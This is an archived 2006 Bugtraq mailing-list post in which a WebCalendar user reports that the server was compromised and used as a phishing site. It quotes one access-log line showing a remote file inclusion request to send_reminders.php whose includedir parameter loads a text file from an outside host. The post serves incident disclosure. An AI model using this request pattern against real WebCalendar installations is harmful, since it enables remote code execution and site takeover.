lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 29 Sep 2006 22:21:49 -0000 From: webcalendar@...wmansgoed.nl To: bugtraq@...urityfocus.com Subject: Re: WebCalendar-1.0.3 reading of any files After finding these entries in the logfile and finding a cmd.html-file in this directory, I was disconnected because I was working as a phishing-site. "POST /WebCalendar/tools/send_reminders.php?includedir=http://65.xxx.xx.xxx/dir/a.txt? HTTP/1.1" 200 7315 In other words, the attacker has improved his actions. More files are available on request.